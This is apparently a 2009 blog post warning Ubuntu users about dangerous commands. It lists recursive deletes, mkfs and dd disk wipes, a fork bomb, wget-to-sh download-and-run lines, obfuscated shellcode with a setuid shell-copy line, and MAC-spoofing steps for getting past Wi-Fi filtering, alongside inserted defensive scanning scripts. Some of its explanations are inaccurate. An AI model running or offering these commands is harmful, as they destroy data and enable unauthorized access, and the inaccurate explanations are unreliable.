Dangers in Ubuntu

Monday, February 9, 2009

These commands should not be run on your computer:

sudo rm -rf / (will delete all the files on your system) - requires administrator rights!

sudo rm -rf . (will delete the current directory you're in) - requires administrator rights!

sudo rm -rf * (will delete all the files in the current folder) - requires administrator rights!

rm -rf * or rm -rf *.* (will delete all the files in the current folder) - No administrator rights needed!

rm -rf ~/ & (will destroy your home directory) - No administrator rights needed!

Commands which will erase the hard disk:

sudo mkfs (will format your hard drive) - requires administrator rights!

sudo mkfs.ext3 (will format your hard drive) - requires administrator rights!

sudo mkfs.bfs (will format your hard drive) - requires administrator rights!

sudo mkfs.cramfs (will format your hard drive) - No administrator rights needed!

sudo mkfs.ext2 (will format your hard drive) - requires administrator rights!

sudo mkfs.minix (will format your hard drive) - requires administrator rights!

sudo mkfs.msdos (will format your hard drive) - requires administrator rights!

sudo mkfs.reiserfs (will format your hard drive) - requires administrator rights!

sudo mkfs.vfat (will format your hard drive) - requires administrator rights!

The dd command can be very dangerous. Here are some examples, but remember that these can vary often!

sudo dd if=/dev/zero of=/dev/hda (MOST DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) (requires administrator rights)

sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)

sudo dd if=something of=/dev/hda (Needs administrator rights)

WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb in the case of SATA and SCSI.

Block device manipulation: causes raw data to be written to a block device. This often clobbers the file system and causes total loss of data!

any_command > /dev/sda

dd if=something of=/dev/sda

Forkbomb: a malicious script that keeps spawning processes until your system freezes. This forces you to do a hard reboot, which may cause damage to your system.

CODE :

:(){:|:&};:

CODE :

fork while fork

Tarbomb: Let's say somebody who claims to want to help you offers a tar.gz or tar.bz2 archive and asks you to extract it into an existing directory. The archive can be crafted to explode into billions of files, or to inject files over existing ones on the system by guessing their filenames. Make a habit of decompressing tar.gz or tar.bz2 archives inside a newly created empty directory!

Decompression bomb: Here's another example. Let's say somebody asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of gigabytes, filling your hard drive until it freezes! You should not touch data from an untrusted source!
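A way to look inside an archive before extracting it, covering both the tarbomb and the decompression bomb cases above. This is an added example, not code from the original post; the function names and the default limits (10,000 entries, 1 GiB) are assumptions, and the sample archive is constructed in memory.

```python
import io
import tarfile
from pathlib import PurePosixPath

def inspect_tar(fileobj, max_members=10_000, max_total=1 << 30):
    """List problems in a tar/tar.gz/tar.bz2 stream without extracting anything.
    The limits (10,000 entries, 1 GiB unpacked) are assumed defaults; tune them."""
    findings, tops, total, count = [], set(), 0, 0
    # "r|*" reads the archive as a forward-only stream and detects the compression.
    with tarfile.open(fileobj=fileobj, mode="r|*") as tar:
        for m in tar:
            count += 1
            total += m.size                      # size declared in the member header
            if count > max_members or total > max_total:
                findings.append("exceeds entry/size limit (stopped reading)")
                break                            # stop before reading the member data
            path = PurePosixPath(m.name)
            if path.is_absolute() or ".." in path.parts:
                findings.append(f"escapes target directory: {m.name}")
            if m.issym() or m.islnk():
                link = PurePosixPath(m.linkname)
                if link.is_absolute() or ".." in link.parts:
                    findings.append(f"link leaves target directory: {m.name} -> {m.linkname}")
            elif not (m.isfile() or m.isdir()):
                findings.append(f"special file (device/FIFO): {m.name}")
            parts = [p for p in path.parts if p != "/"]
            if parts:
                tops.add(parts[0])
    if len(tops) > 1:
        findings.append(f"tarbomb: {len(tops)} top-level entries")
    return findings

def make_tar(entries):
    """Build a constructed in-memory tar.gz from (name, size) pairs for the demo."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, size in entries:
            info = tarfile.TarInfo(name)
            info.size = size
            tar.addfile(info, io.BytesIO(b"\0" * size))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    sample = make_tar([("a.txt", 1), ("b.txt", 1), ("../evil", 1), ("/etc/x", 1)])
    for finding in inspect_tar(sample):
        print(finding)
```

An empty list means the archive unpacks into a single top-level directory, stays inside it, and is within the limits; anything else is a reason to extract only inside a fresh empty directory, or not at all.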

Shellscript: This one is very dangerous! Somebody gives you a link to a shell script and then asks you to execute it. The script can contain any dangerous command they choose, which will damage your system. Do not execute code from people you don't trust! Here are some examples:

CODE :

wget http://my_site/my_file

sh ./my_file

Example :

wget http://ceattingal.ac.in/malicious-script

sh ./malicious-script

or

wget http://my_site/my_file -O- | sh

Example :

wget http://ihrd.org/malicious-script -O- | sh
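A first-pass check to run over a downloaded script before deciding whether to execute it, looking for the command families listed on this page. This is an added example, not code from the original post; the rule list, the function name and the sample script are constructed, and matching curl alongside wget goes slightly beyond the page's own examples.

```python
import re

# Rules for the command families this page lists. Added here as an assumption of
# what a quick pre-execution check could look for; the list is not exhaustive.
RULES = [
    ("recursive delete of /, ~, . or *",
     re.compile(r"\brm\s+-\w*r\w*\s+(?:/|~/?|\.|\*(?:\.\*)?)(?=\s|$|[;&|])")),
    ("mkfs invocation", re.compile(r"\bmkfs(?:\.\w+)?\b")),
    ("dd onto a raw disk", re.compile(r"\bdd\b.*\bof=/dev/(?:sd|hd)\w*")),
    ("redirect onto a raw disk", re.compile(r">\s*/dev/(?:sd|hd)\w*")),
    ("download piped to shell",
     re.compile(r"\b(?:wget|curl)\b.*\|\s*(?:sudo\s+)?(?:ba)?sh\b")),
]

def scan_script(text):
    """Return (line_number, rule_name) for every rule hit; never executes anything."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue                      # skip blanks, comments and the shebang
        for name, pattern in RULES:
            if pattern.search(stripped):
                hits.append((lineno, name))
    return hits

# Constructed sample of a downloaded "installer" (example.invalid is a placeholder).
SAMPLE = """\
#!/bin/sh
echo "Installing..."
rm -rf /tmp/build
wget http://example.invalid/setup -O- | sh
dd if=/dev/zero of=/dev/sda
cd ~ && rm -rf ~/ &
"""

if __name__ == "__main__":
    for lineno, name in scan_script(SAMPLE):
        print(f"line {lineno}: {name}")
```

Obfuscated payloads, such as the character-shifted string in the Python one-liner on this page, match none of these rules, so an empty result means "no known pattern", not "safe".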

Compiling code: Somebody gives you the source code to an application and tells you to compile it. It is easy to hide dangerous code inside a large wad of source code, so the attacker can easily damage your system. Do not compile code, or execute the compiled code, unless the source is that of some well-known application, obtained from a reputable site.

CODE :

char esp[] __attribute__ ((section(".text"))) /* e.s.p

release */

= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"

"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"

"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"

"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"

"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"

"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"

"x6ex2fx73x68x00x2dx63x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";

To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.

Here's another example of code that should definitely NOT be executed by anyone!

CODE : python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up.

One more threat is that in Ubuntu we can actually change our machine's MAC address. This can be used to bypass MAC filtering for Wi-Fi security (where the router is set to allow an internet connection to a specific MAC address): if you know which MAC address is allowed to access the net, you can change your device's MAC address to it and surf the net without the router owner's permission. Here is the code to change your device's MAC address.

First, check your MAC address by typing #ifconfig in the terminal.

Now the code for changing it:

#ifconfig eth0 down

#ifconfig eth0 hw ether 1b:2a:4c:4d:8e (this is an example; you can put any MAC address you want in place of this address)

#ifconfig eth0 up

That's it, MAC address changed. Confirm the change by typing #ifconfig to see your new MAC address.

Please note I am giving this code for knowledge, learning purpose only. I don't want to encourage people to do harm, I don't want to harm others. This thing is written so that people stay alert and safe.
